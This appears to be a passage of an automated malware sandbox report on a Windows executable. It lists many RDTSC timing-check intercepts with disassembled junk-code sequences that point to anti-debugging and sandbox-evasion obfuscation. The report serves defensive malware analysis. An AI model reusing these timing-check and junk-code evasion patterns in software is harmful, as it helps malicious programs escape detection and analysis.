              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D0E8D5 second address: D0E8D9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D0E8D9 second address: D0E8E3 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F15FCC2EA66h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D0E956 second address: D0E97D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F15FCD6BB62h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, esi 0x0000000a mov dword ptr [ebp+122D1876h], esi 0x00000010 nop 0x00000011 pushad 0x00000012 push eax 0x00000013 push edx 0x00000014 jo 00007F15FCD6BB56h 0x0000001a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D0EA1E second address: D0EA22 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D0EA22 second address: D0EA28 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D0EA28 second address: D0EA2E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D0EA2E second address: D0EA32 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D0F322 second address: D0F332 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 mov dword ptr [esp+04h], eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D0F332 second address: D0F33C instructions: 0x00000000 rdtsc 0x00000002 jne 00007F15FCD6BB56h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D5428A second address: D54294 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F15FCC2EA66h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D54294 second address: D542B0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F15FCD6BB62h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D542B0 second address: D542B6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D542B6 second address: D542C4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ebx 0x00000007 jo 00007F15FCD6BB56h 0x0000000d pop ebx 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D542C4 second address: D542CE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jp 00007F15FCC2EA66h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D544A6 second address: D544AA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D544AA second address: D544B6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007F15FCC2EA66h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D54619 second address: D5465F instructions: 0x00000000 rdtsc 0x00000002 jno 00007F15FCD6BB56h 0x00000008 jmp 00007F15FCD6BB68h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f jbe 00007F15FCD6BB70h 0x00000015 jmp 00007F15FCD6BB68h 0x0000001a push ebx 0x0000001b pop ebx 0x0000001c push eax 0x0000001d push edx 0x0000001e pushad 0x0000001f popad 0x00000020 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D5465F second address: D54663 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D5910F second address: D59116 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D59116 second address: D5914D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F15FCC2EA73h 0x00000008 jng 00007F15FCC2EA66h 0x0000000e popad 0x0000000f pop edx 0x00000010 pop eax 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007F15FCC2EA76h 0x00000018 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D5914D second address: D59152 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D59152 second address: D5915A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D5B5EB second address: D5B5EF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D5B5EF second address: D5B5F7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D5B146 second address: D5B164 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 jmp 00007F15FCD6BB65h 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D5B164 second address: D5B16E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D5B16E second address: D5B172 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D5B172 second address: D5B176 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D5B176 second address: D5B17C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D5B2B1 second address: D5B2B5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D5B2B5 second address: D5B2BE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D5B2BE second address: D5B338 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 jmp 00007F15FCC2EA6Fh 0x0000000c popad 0x0000000d pushad 0x0000000e jmp 00007F15FCC2EA78h 0x00000013 pushad 0x00000014 jnc 00007F15FCC2EA66h 0x0000001a jmp 00007F15FCC2EA77h 0x0000001f jmp 00007F15FCC2EA77h 0x00000024 pushad 0x00000025 popad 0x00000026 popad 0x00000027 push eax 0x00000028 push edx 0x00000029 jmp 00007F15FCC2EA6Eh 0x0000002e pushad 0x0000002f popad 0x00000030 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D5E660 second address: D5E66A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jg 00007F15FCD6BB56h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D5E66A second address: D5E67A instructions: 0x00000000 rdtsc 0x00000002 jne 00007F15FCC2EA66h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d pop eax 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D5E67A second address: D5E67E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D5DEF5 second address: D5DF05 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F15FCC2EA6Ch 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D5E075 second address: D5E07B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D625A2 second address: D625A8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D625A8 second address: D625AE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D625AE second address: D625B5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D625B5 second address: D625BB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D625BB second address: D625C5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007F15FCC2EA66h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D625C5 second address: D625D7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jo 00007F15FCD6BB5Eh 0x0000000e pushad 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D61C97 second address: D61C9B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D61C9B second address: D61CCA instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 jmp 00007F15FCD6BB5Eh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jmp 00007F15FCD6BB61h 0x00000010 pop esi 0x00000011 pushad 0x00000012 js 00007F15FCD6BB5Eh 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D61CCA second address: D61CF1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F15FCC2EA72h 0x0000000d jmp 00007F15FCC2EA6Dh 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D61E3B second address: D61E45 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D61E45 second address: D61E4F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007F15FCC2EA66h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D61E4F second address: D61E55 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D61FA9 second address: D61FBD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F15FCC2EA6Eh 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D6226D second address: D62271 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D670F2 second address: D6710B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F15FCC2EA6Fh 0x00000007 jnl 00007F15FCC2EA66h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D6710B second address: D6711A instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 jmp 00007F15FCD6BB5Ah 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D6C082 second address: D6C09E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 jmp 00007F15FCC2EA77h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D6C52B second address: D6C531 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D6C531 second address: D6C54D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F15FCC2EA72h 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D6C54D second address: D6C553 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D6C806 second address: D6C80C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D6C80C second address: D6C814 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D741DD second address: D741E7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007F15FCC2EA66h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D741E7 second address: D74203 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push ebx 0x0000000a pop ebx 0x0000000b jmp 00007F15FCD6BB5Ah 0x00000010 jno 00007F15FCD6BB56h 0x00000016 popad 0x00000017 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D72726 second address: D72733 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 js 00007F15FCC2EA66h 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D72733 second address: D7273D instructions: 0x00000000 rdtsc 0x00000002 jp 00007F15FCD6BB56h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D7273D second address: D72743 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D729F1 second address: D729FC instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D729FC second address: D72A0D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007F15FCC2EA66h 0x0000000a jo 00007F15FCC2EA66h 0x00000010 popad 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D72A0D second address: D72A13 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D72A13 second address: D72A19 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D72A19 second address: D72A1D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D73674 second address: D736B0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F15FCC2EA6Eh 0x00000007 jmp 00007F15FCC2EA6Eh 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push ecx 0x0000000f pushad 0x00000010 pushad 0x00000011 popad 0x00000012 jmp 00007F15FCC2EA72h 0x00000017 pushad 0x00000018 popad 0x00000019 popad 0x0000001a push esi 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D73E8E second address: D73E93 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CCCDE3 second address: CCCDE9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CCCDE9 second address: CCCE05 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F15FCD6BB64h 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CCCE05 second address: CCCE21 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 pushad 0x0000000a popad 0x0000000b jnl 00007F15FCC2EA66h 0x00000011 popad 0x00000012 push eax 0x00000013 push edx 0x00000014 jno 00007F15FCC2EA66h 0x0000001a pushad 0x0000001b popad 0x0000001c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D809FC second address: D80A33 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F15FCD6BB64h 0x00000009 popad 0x0000000a push ecx 0x0000000b jnp 00007F15FCD6BB56h 0x00000011 pop ecx 0x00000012 popad 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 push edi 0x00000017 pop edi 0x00000018 push edx 0x00000019 pop edx 0x0000001a ja 00007F15FCD6BB56h 0x00000020 popad 0x00000021 pushad 0x00000022 push edx 0x00000023 pop edx 0x00000024 pushad 0x00000025 popad 0x00000026 push eax 0x00000027 push edx 0x00000028 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D80A33 second address: D80A38 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D80A38 second address: D80A3E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D80A3E second address: D80A42 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D80BA6 second address: D80BC2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 jmp 00007F15FCD6BB66h 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D80BC2 second address: D80BDE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jns 00007F15FCC2EA6Eh 0x0000000c push ecx 0x0000000d pop ecx 0x0000000e jp 00007F15FCC2EA66h 0x00000014 pop edx 0x00000015 pop eax 0x00000016 push eax 0x00000017 push edx 0x00000018 push eax 0x00000019 push edx 0x0000001a push edi 0x0000001b pop edi 0x0000001c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D80BDE second address: D80BF7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jmp 00007F15FCD6BB61h 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D80F32 second address: D80F3C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007F15FCC2EA66h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D80F3C second address: D80F42 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D80F42 second address: D80F60 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 jnc 00007F15FCC2EA66h 0x00000009 pop ecx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jno 00007F15FCC2EA70h 0x00000014 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D8122A second address: D8123B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007F15FCD6BB56h 0x0000000a jno 00007F15FCD6BB56h 0x00000010 popad 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D81387 second address: D81392 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push ecx 0x00000008 pop ecx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D81392 second address: D813CC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007F15FCD6BB56h 0x0000000a jmp 00007F15FCD6BB5Fh 0x0000000f popad 0x00000010 pop esi 0x00000011 pushad 0x00000012 jmp 00007F15FCD6BB62h 0x00000017 push ecx 0x00000018 push eax 0x00000019 pop eax 0x0000001a pop ecx 0x0000001b push eax 0x0000001c push edx 0x0000001d jnp 00007F15FCD6BB56h 0x00000023 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D813CC second address: D813D2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D86157 second address: D86178 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F15FCD6BB67h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push edx 0x0000000a pushad 0x0000000b push ecx 0x0000000c pop ecx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D86178 second address: D86189 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F15FCC2EA6Bh 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D86189 second address: D86192 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D86192 second address: D86198 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D8DF49 second address: D8DF4D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D8DF4D second address: D8DF66 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edi 0x00000007 jmp 00007F15FCC2EA6Dh 0x0000000c pop edi 0x0000000d push eax 0x0000000e push edx 0x0000000f push ecx 0x00000010 pop ecx 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D8C270 second address: D8C28F instructions: 0x00000000 rdtsc 0x00000002 jne 00007F15FCD6BB5Eh 0x00000008 push ecx 0x00000009 jp 00007F15FCD6BB56h 0x0000000f pop ecx 0x00000010 pop edx 0x00000011 pop eax 0x00000012 pushad 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 popad 0x00000017 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D8C28F second address: D8C293 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D8C293 second address: D8C2A0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push edx 0x0000000a pop edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D8C57F second address: D8C59C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F15FCC2EA79h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D8C707 second address: D8C732 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F15FCD6BB58h 0x00000008 pushad 0x00000009 popad 0x0000000a push edx 0x0000000b jmp 00007F15FCD6BB68h 0x00000010 pop edx 0x00000011 pop edx 0x00000012 pop eax 0x00000013 push eax 0x00000014 push eax 0x00000015 push edx 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
